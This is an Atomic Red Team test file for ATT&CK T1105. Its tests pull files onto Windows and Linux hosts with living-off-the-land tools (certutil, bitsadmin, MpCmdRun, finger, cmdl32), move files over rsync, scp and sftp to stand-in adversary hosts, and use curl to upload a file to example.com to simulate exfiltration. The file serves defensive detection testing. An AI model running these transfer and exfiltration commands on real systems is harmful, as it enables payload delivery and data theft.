atomic-red-team/atomics/T1105/T1105.md

T1105 - Ingress Tool Transfer

Description from ATT&CK

Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.

Atomic Tests

• Atomic Test #1 - rsync remote file copy (push)

• Atomic Test #2 - rsync remote file copy (pull)

• Atomic Test #3 - scp remote file copy (push)

• Atomic Test #4 - scp remote file copy (pull)

• Atomic Test #5 - sftp remote file copy (push)

• Atomic Test #6 - sftp remote file copy (pull)

• Atomic Test #7 - certutil download (urlcache)

• Atomic Test #8 - certutil download (verifyctl)

• Atomic Test #9 - Windows - BITSAdmin BITS Download

• Atomic Test #10 - Windows - PowerShell Download

• Atomic Test #11 - OSTAP Worming Activity

• Atomic Test #12 - svchost writing a file to a UNC path

• Atomic Test #13 - Download a File with Windows Defender MpCmdRun.exe

• Atomic Test #14 - whois file download

• Atomic Test #15 - File Download via PowerShell

• Atomic Test #16 - File download with finger.exe on Windows

• Atomic Test #17 - Download a file with IMEWDBLD.exe

• Atomic Test #18 - Curl Download File

• Atomic Test #19 - Curl Upload File

• Atomic Test #20 - Download a file with Microsoft Connection Manager Auto-Download

Atomic Test #1 - rsync remote file copy (push)

Utilize rsync to perform a remote file copy (push)

Supported Platforms: Linux, macOS

auto_generated_guid: 0fc6e977-cb12-44f6-b263-2824ba917409

Inputs:

Name	Description	Type	Default Value
remote_path	Remote path to receive rsync	Path	/tmp/victim-files
remote_host	Remote host to copy toward	String	victim-host
local_path	Path of folder to copy	Path	/tmp/adversary-rsync/
username	User account to authenticate on remote host	String	victim

Attack Commands: Run with bash!

rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path}

Atomic Test #2 - rsync remote file copy (pull)

Utilize rsync to perform a remote file copy (pull)

Supported Platforms: Linux, macOS

auto_generated_guid: 3180f7d5-52c0-4493-9ea0-e3431a84773f

Inputs:

Name	Description	Type	Default Value
remote_path	Path of folder to copy	Path	/tmp/adversary-rsync/
remote_host	Remote host to copy from	String	adversary-host
local_path	Local path to receive rsync	Path	/tmp/victim-files
username	User account to authenticate on remote host	String	adversary

Attack Commands: Run with bash!

rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path}

Atomic Test #3 - scp remote file copy (push)

Utilize scp to perform a remote file copy (push)

Supported Platforms: Linux, macOS

auto_generated_guid: 83a49600-222b-4866-80a0-37736ad29344

Inputs:

Name	Description	Type	Default Value
remote_path	Remote path to receive scp	Path	/tmp/victim-files/
local_file	Path of file to copy	Path	/tmp/adversary-scp
remote_host	Remote host to copy toward	String	victim-host
username	User account to authenticate on remote host	String	victim

Attack Commands: Run with bash!

scp #{local_file} #{username}@#{remote_host}:#{remote_path}

Atomic Test #4 - scp remote file copy (pull)

Utilize scp to perform a remote file copy (pull)

Supported Platforms: Linux, macOS

auto_generated_guid: b9d22b9a-9778-4426-abf0-568ea64e9c33

Inputs:

Name	Description	Type	Default Value
remote_host	Remote host to copy from	String	adversary-host
local_path	Local path to receive scp	Path	/tmp/victim-files/
remote_file	Path of file to copy	Path	/tmp/adversary-scp
username	User account to authenticate on remote host	String	adversary

Attack Commands: Run with bash!

scp #{username}@#{remote_host}:#{remote_file} #{local_path}

Atomic Test #5 - sftp remote file copy (push)

Utilize sftp to perform a remote file copy (push)

Supported Platforms: Linux, macOS

auto_generated_guid: f564c297-7978-4aa9-b37a-d90477feea4e

Inputs:

Name	Description	Type	Default Value
remote_path	Remote path to receive sftp	Path	/tmp/victim-files/
local_file	Path of file to copy	Path	/tmp/adversary-sftp
remote_host	Remote host to copy toward	String	victim-host
username	User account to authenticate on remote host	String	victim

Attack Commands: Run with bash!

sftp #{username}@#{remote_host}:#{remote_path} <<< $'put #{local_file}'

Atomic Test #6 - sftp remote file copy (pull)

Utilize sftp to perform a remote file copy (pull)

Supported Platforms: Linux, macOS

auto_generated_guid: 0139dba1-f391-405e-a4f5-f3989f2c88ef

Inputs:

Name	Description	Type	Default Value
remote_host	Remote host to copy from	String	adversary-host
local_path	Local path to receive sftp	Path	/tmp/victim-files/
remote_file	Path of file to copy	Path	/tmp/adversary-sftp
username	User account to authenticate on remote host	String	adversary

Attack Commands: Run with bash!

sftp #{username}@#{remote_host}:#{remote_file} #{local_path}

Atomic Test #7 - certutil download (urlcache)

Use certutil -urlcache argument to download a file from the web. Note - /urlcache also works!

Supported Platforms: Windows

auto_generated_guid: dd3b61dd-7bbc-48cd-ab51-49ad1a776df0

Inputs:

Name	Description	Type	Default Value
remote_file	URL of file to copy	Url	https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
local_path	Local path to place file	Path	Atomic-license.txt

Attack Commands: Run with command_prompt!

cmd /c certutil -urlcache -split -f #{remote_file} #{local_path}

Cleanup Commands:

del #{local_path} >nul 2>&1

Atomic Test #8 - certutil download (verifyctl)

Use certutil -verifyctl argument to download a file from the web. Note - /verifyctl also works!

Supported Platforms: Windows

auto_generated_guid: ffd492e3-0455-4518-9fb1-46527c9f241b

Inputs:

Name	Description	Type	Default Value
remote_file	URL of file to copy	Url	https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
local_path	Local path to place file	Path	Atomic-license.txt

Attack Commands: Run with powershell!

$datePath = "certutil-$(Get-Date -format yyyy_MM_dd)"
New-Item -Path $datePath -ItemType Directory
Set-Location $datePath
certutil -verifyctl -split -f #{remote_file}
Get-ChildItem | Where-Object {$_.Name -notlike "*.txt"} | Foreach-Object { Move-Item $_.Name -Destination #{local_path} }

Cleanup Commands:

Remove-Item "certutil-$(Get-Date -format yyyy_MM_dd)" -Force -Recurse -ErrorAction Ignore

Atomic Test #9 - Windows - BITSAdmin BITS Download

This test uses BITSAdmin.exe to schedule a BITS job for the download of a file. This technique is used by Qbot malware to download payloads.

Supported Platforms: Windows

auto_generated_guid: a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b

Inputs:

Name	Description	Type	Default Value
bits_job_name	Name of the created BITS job	String	qcxjb7
local_path	Local path to place file	Path	%temp%\Atomic-license.txt
remote_file	URL of file to copy	Url	https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt

Attack Commands: Run with command_prompt!

C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority HIGH #{remote_file} #{local_path}

Atomic Test #10 - Windows - PowerShell Download

This test uses PowerShell to download a payload. This technique is used by multiple adversaries and malware families.

Supported Platforms: Windows

auto_generated_guid: 42dc4460-9aa6-45d3-b1a6-3955d34e1fe8

Inputs:

Name	Description	Type	Default Value
remote_file	URL of file to copy	Url	https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
destination_path	Destination path to file	Path	$env:TEMP\Atomic-license.txt

Attack Commands: Run with powershell!

(New-Object System.Net.WebClient).DownloadFile("#{remote_file}", "#{destination_path}")

Cleanup Commands:

Remove-Item #{destination_path} -Force -ErrorAction Ignore

Atomic Test #11 - OSTAP Worming Activity

OSTap copies itself in a specfic way to shares and secondary drives. This emulates the activity.

Supported Platforms: Windows

auto_generated_guid: 2ca61766-b456-4fcf-a35a-1233685e1cad

Inputs:

Name	Description	Type	Default Value
destination_path	Path to create remote file at. Default is local admin share.	String	\\localhost\C$

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

pushd #{destination_path}
echo var fileObject = WScript.createobject("Scripting.FileSystemObject");var newfile = fileObject.CreateTextFile("AtomicTestFileT1105.js", true);newfile.WriteLine("This is an atomic red team test file for T1105. It simulates how OSTap worms accross network shares and drives.");newfile.Close(); > AtomicTestT1105.js
CScript.exe AtomicTestT1105.js //E:JScript
del AtomicTestT1105.js /Q >nul 2>&1
del AtomicTestFileT1105.js /Q >nul 2>&1
popd

Atomic Test #12 - svchost writing a file to a UNC path

svchost.exe writing a non-Microsoft Office file to a file with a UNC path. Upon successful execution, this will rename cmd.exe as svchost.exe and move it to c:\, then execute svchost.exe with output to a txt file.

Supported Platforms: Windows

auto_generated_guid: fa5a2759-41d7-4e13-a19c-e8f28a53566f

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

copy C:\Windows\System32\cmd.exe C:\svchost.exe
C:\svchost.exe /c echo T1105 > \\localhost\c$\T1105.txt

Cleanup Commands:

del C:\T1105.txt >nul 2>&1
del C:\\svchost.exe >nul 2>&1

Atomic Test #13 - Download a File with Windows Defender MpCmdRun.exe

Uses the Windows Defender to download a file from the internet (must have version 4.18.2007.8-0, 4.18.2007.9, or 4.18.2009.9 installed). The input arguments "remote_file" and "local_path" can be used to specify the download URL and the name of the output file. By default, the test downloads the Atomic Red Team license file to the temp directory.

More info and how to find your version can be found here https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/

Supported Platforms: Windows

auto_generated_guid: 815bef8b-bf91-4b67-be4c-abe4c2a94ccc

Inputs:

Name	Description	Type	Default Value
remote_file	URL of file to download	Url	https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
local_path	Location to save downloaded file	Path	%temp%\Atomic-license.txt

Attack Commands: Run with command_prompt!

cd "%ProgramData%\Microsoft\Windows Defender\platform\4.18*"
MpCmdRun.exe -DownloadFile -url #{remote_file} -path #{local_path}

Cleanup Commands:

del #{local_path} >nul 2>&1
del %temp%\MpCmdRun.log >nul 2>&1

Dependencies: Run with powershell!

Description: Must have one of these Windows Defender versions installed: 4.18.2007.8-0, 4.18.2007.9, or 4.18.2009.9

Check Prereq Commands:

$retVal = 1
foreach ($version in @("4.18.2007.8-0","4.18.2007.9","4.18.2009.9")){
  if (Test-Path "$env:ProgramData\Microsoft\Windows Defender\Platform\$version") { $retVal =  0}
}
exit $retVal

Get Prereq Commands:

Write-Host "Windows Defender verion 4.18.2007.8-0, 4.18.2007.9, or 4.18.2009.9 must be installed manually"

Atomic Test #14 - whois file download

Download a remote file using the whois utility

Supported Platforms: Linux, macOS

auto_generated_guid: c99a829f-0bb8-4187-b2c6-d47d1df74cab

Inputs:

Name	Description	Type	Default Value
remote_host	Remote hostname or IP address	String	localhost
remote_port	Remote port to connect to	Integer	8443
output_file	Path of file to save output to	Path	/tmp/T1105.whois.out
query	Query to send to remote server	String	Hello from Atomic Red Team test T1105
timeout	Timeout period before ending process (seconds)	Integer	1

Attack Commands: Run with sh!

timeout --preserve-status #{timeout} whois -h #{remote_host} -p #{remote_port} "#{query}" > #{output_file}

Cleanup Commands:

rm -f #{output_file}

Dependencies: Run with sh!

Description: The whois and timeout commands must be present

Check Prereq Commands:

which whois && which timeout

Get Prereq Commands:

echo "Please install timeout and the whois package"

Atomic Test #15 - File Download via PowerShell

Use PowerShell to download and write an arbitrary file from the internet. Example is from the 2021 Threat Detection Report by Red Canary.

Supported Platforms: Windows

auto_generated_guid: 54a4daf1-71df-4383-9ba7-f1a295d8b6d2

Inputs:

Name	Description	Type	Default Value
target_remote_file	File to download	Url	https://raw.githubusercontent.com/redcanaryco/atomic-red-team/4042cb3433bce024e304500dcfe3c5590571573a/LICENSE.txt
output_file	File to write to	String	LICENSE.txt

Attack Commands: Run with powershell!

(New-Object Net.WebClient).DownloadString('#{target_remote_file}') | Out-File #{output_file}; Invoke-Item #{output_file}

Atomic Test #16 - File download with finger.exe on Windows

Simulate a file download using finger.exe. Connect to localhost by default, use custom input argument to test finger connecting to an external server. Because this is being tested on the localhost, you should not be expecting a successful connection https://www.exploit-db.com/exploits/48815 https://www.bleepingcomputer.com/news/security/windows-10-finger-command-can-be-abused-to-download-or-steal-files/

Supported Platforms: Windows

auto_generated_guid: 5f507e45-8411-4f99-84e7-e38530c45d01

Inputs:

Name	Description	Type	Default Value
remote_host	Remote hostname or IP address	String	localhost

Attack Commands: Run with command_prompt!

finger base64_filedata@#{remote_host}

Atomic Test #17 - Download a file with IMEWDBLD.exe

Use IMEWDBLD.exe (built-in to windows) to download a file. This will throw an error for an invalid dictionary file. Downloaded files can be found in "%LocalAppData%\Microsoft\Windows\INetCache<8_RANDOM_ALNUM_CHARS>/[1]." or `%LocalAppData%\Microsoft\Windows\INetCache\IE<8_RANDOM_ALNUM_CHARS>/[1].. Run "Get-ChildItem -Path C:\Users<USERNAME>\AppData\Local\Microsoft\Windows\INetCache\ -Include * -Recurse -Force -File -ErrorAction SilentlyContinue" without quotes and adding the correct username and file name to locate the file.

Supported Platforms: Windows

auto_generated_guid: 1a02df58-09af-4064-a765-0babe1a0d1e2

Inputs:

Name	Description	Type	Default Value
remote_url	Location of file to be downloaded.	url	https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/T1105.yaml
file_name	Name of the file to be downloaded without extension.	string	T1105

Attack Commands: Run with powershell!

$imewdbled = $env:SystemRoot + "\System32\IME\SHARED\IMEWDBLD.exe"
& $imewdbled #{remote_url}

Cleanup Commands:

$inetcache = $env:LOCALAPPDATA + "\Microsoft\Windows\INetCache\" 
$file_to_be_removed = [string[]] (Get-ChildItem -Path $inetcache -Include #{file_name}* -Recurse -Force -File -ErrorAction SilentlyContinue)
if("" -ne "$file_to_be_removed") { Remove-Item "$file_to_be_removed" -ErrorAction Ignore }

Atomic Test #18 - Curl Download File

The following Atomic utilizes native curl.exe, or downloads it if not installed, to download a remote DLL and output to a number of directories to simulate malicious behavior. Expected output will include whether the file downloaded successfully or not.

Supported Platforms: Windows

auto_generated_guid: 2b080b99-0deb-4d51-af0f-833d37c4ca6a

Inputs:

Name	Description	Type	Default Value
file_download	File to download	String	https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll
curl_path	path to curl.exe	Path	C:\Windows\System32\Curl.exe

Attack Commands: Run with command_prompt!

#{curl_path} -k #{file_download} -o c:\users\public\music\allthethingsx64.dll
#{curl_path} -k #{file_download} --output c:\users\public\music\allthethingsx64.dll
#{curl_path} -k #{file_download} -o c:\programdata\allthethingsx64.dll
#{curl_path} -k #{file_download} -o %Temp%\allthethingsx64.dll

Cleanup Commands:

del c:\users\public\music\allthethingsx64.dll >nul 2>&1
del c:\users\public\music\allthethingsx64.dll >nul 2>&1
del c:\programdata\allthethingsx64.dll >nul 2>&1
del %Temp%\allthethingsx64.dll >nul 2>&1

Dependencies: Run with powershell!

Description: Curl must be installed on system.

Check Prereq Commands:

if (Test-Path #{curl_path}) {exit 0} else {exit 1}

Get Prereq Commands:

Invoke-WebRequest "https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip" -Outfile $env:temp\curl.zip
Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl
Copy-Item $env:temp\curl\curl-7.79.1-win64-mingw\bin\curl.exe C:\Windows\System32\Curl.exe
Remove-Item $env:temp\curl
Remove-Item $env:temp\curl.zip

Atomic Test #19 - Curl Upload File

The following Atomic utilizes native curl.exe, or downloads it if not installed, to upload a txt file to simulate data exfiltration Expected output will include whether the file uploaded successfully or not.

Supported Platforms: Windows

auto_generated_guid: 635c9a38-6cbf-47dc-8615-3810bc1167cf

Inputs:

Name	Description	Type	Default Value
curl_path	path to curl.exe	Path	C:\Windows\System32\Curl.exe
remote_destination	Remote destination	String	www.example.com
file_path	File to upload	String	c:\temp\atomictestfile.txt

Attack Commands: Run with command_prompt!

#{curl_path} -T #{file_path} #{remote_destination}
#{curl_path} --upload-file #{file_path} #{remote_destination}
#{curl_path} -d #{file_path} #{remote_destination}
#{curl_path} --data #{file_path} #{remote_destination}

Dependencies: Run with powershell!

Description: Curl must be installed on system.

Check Prereq Commands:

if (Test-Path #{curl_path}) {exit 0} else {exit 1}

Get Prereq Commands:

Invoke-WebRequest “https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip” -Outfile $env:temp\curl.zip
Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl
Copy-Item $env:temp\curl\curl-7.79.1-win64-mingw\bin\curl.exe C:\Windows\System32\Curl.exe
Remove-Item $env:temp\curl
Remove-Item $env:temp\curl.zip

Description: A file must be created to upload

Check Prereq Commands:

if (Test-Path #{file_path}) {exit 0} else {exit 1}

Get Prereq Commands:

echo "This is an Atomic Test File" > #{file_path}

Atomic Test #20 - Download a file with Microsoft Connection Manager Auto-Download

Uses the cmdl32 to download arbitrary file from the internet. The cmdl32 package is allowed to install the profile used to launch the VPN connection. However, the config is modified to download the arbitary file. The issue of cmdl32.exe detecting and deleting the payload by identifying it as not a VPN Servers profile is avoided by setting a temporary TMP folder and denying the delete permission to all files for the user. Upon successful execution the test will open calculator and Notepad executable for 10 seconds. reference: https://twitter.com/ElliotKillick/status/1455897435063074824 https://github.com/LOLBAS-Project/LOLBAS/pull/151 https://lolbas-project.github.io/lolbas/Binaries/Cmdl32/ https://strontic.github.io/xcyclopedia/library/cmdl32.exe-FA1D5B8802FFF4A85B6F52A52C871BBB.html

Supported Platforms: Windows

auto_generated_guid: d239772b-88e2-4a2e-8473-897503401bcc

Inputs:

Name	Description	Type	Default Value
Path_to_file	Path to the Batch script	Path	PathToAtomicsFolder\T1105\src\T1105.bat

Attack Commands: Run with command_prompt!

#{Path_to_file} 1>NUL

Cleanup Commands:

del /f/s/q %temp%\T1105 >nul 2>&1
rmdir /s/q %temp%\T1105 >nul 2>&1